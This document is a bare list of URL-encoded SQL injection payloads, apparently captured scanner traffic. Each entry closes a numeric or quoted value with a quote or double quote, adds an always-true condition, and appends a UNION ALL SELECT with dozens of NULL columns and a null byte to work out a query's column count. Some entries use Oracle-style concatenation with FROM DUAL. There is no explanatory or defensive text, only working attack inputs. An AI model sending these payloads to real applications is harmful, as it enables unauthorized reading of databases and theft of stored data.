1234.5%27%29%20WHERE%202401%3D2401%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%201079%3D1079%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%209716%3D9716%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%201588%3D1588%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%205585%3D5585%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%202072%3D2072%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%203193%3D3193%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%201922%3D1922%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%208638%3D8638%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%202030%3D2030%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%208057%3D8057%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%205645%3D5645%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%202508%3D2508%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%209779%3D9779%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%205201%3D5201%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%209487%3D9487%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%204558%3D4558%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%204862%3D4862%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%202277%3D2277%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%205917%3D5917%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%206001%3D6001%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%202901%3D2901%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%203614%3D3614%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%203441%3D3441%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%207479%3D7479%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%206606%3D6606%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%201928%3D1928%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%205804%3D5804%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20%7C%7C%20%28SELECT%203860%20FROM%20DUAL%20WHERE%205915%3D5915%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208182%20FROM%20DUAL%20WHERE%207376%3D7376%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205670%20FROM%20DUAL%20WHERE%202905%3D2905%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203904%20FROM%20DUAL%20WHERE%208846%3D8846%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209423%20FROM%20DUAL%20WHERE%204944%3D4944%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209958%20FROM%20DUAL%20WHERE%202313%3D2313%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203067%20FROM%20DUAL%20WHERE%208780%3D8780%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204890%20FROM%20DUAL%20WHERE%203841%3D3841%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 